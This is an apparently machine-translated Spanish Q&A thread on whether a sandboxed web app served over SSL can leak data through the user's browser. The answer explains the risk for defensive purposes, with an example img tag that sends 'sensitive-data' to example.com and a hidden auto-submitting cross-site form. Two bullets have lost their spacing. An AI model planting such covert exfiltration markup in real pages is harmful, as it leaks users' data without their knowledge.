Acceso entre sitios del lado del cliente en un entorno SSL: ¿cuándo es posible hacerlo?

Navega tus respuestas
5

Estoy tratando de imaginar un entorno seguro de espacio aislado para una aplicación que es grande e inexplorada, y puede contener puertas traseras. Viviría en un entorno chroot / virtual sin conexiones salientes habilitadas, y todas las conexiones entrantes provendrán del frontend SSL local utilizando un certificado de cliente autofirmado y una CA (directiva RequireSSL de Apache).

Entonces, nadie podrá conectarse a la aplicación y robar sus datos a través de alguna puerta trasera. Sin embargo, me pregunto si el lado del cliente de la aplicación es técnicamente capaz de realizar solicitudes entre sitios a través del navegador.

¿Puede una página abierta en un contexto SSL hecho por sí mismo permitir que uno de sus elementos de javascript se conecte a otro servidor sin emitir una advertencia visible?

    
pregunta kagali-san 10.08.2012 - 17:18
fuente

1 respuesta

3

Hay un par de formas, que permiten que una aplicación web transmita información a otro servidor utilizando el navegador como relevo. La política del mismo origen evita que otros sitios web accedan a un sitio web sensible, pero hay varios tipos de acceso que no están restringidos.

Por ejemplo:

  • La etiqueta img se puede usar para cargar una imagen desde cualquier servidor: <img src="http://example.com/?log=sensitive-data">
  • Losarchivoscssyjavascriptsepuedencargardelamismamanera
  • Losformulariossepuedenenviaracualquierservidor.PuedeocultarseenuniframeinvisibleyenviarseautomáticamentemedianteJavaScript:<formaction="http://example.com/" method="POST">
  • Hay solicitudes de origen cruzado en HTML5 que utilizan el objeto XMLHttpRequest JavaScript: HTML5 Top 10 de amenazas: ataques furtivos y ataques silenciosos
respondido por el Hendrik Brummermann 10.08.2012 - 23:35
fuente

Lea otras preguntas en las etiquetas

Estándares para la revocación de certificados de CA y parámetros de algoritmo criptográfico de tiempo limitado ¿Cuáles son las diferencias prácticas entre el modo dirigido de SELinux y un sistema operativo basado en capacidades?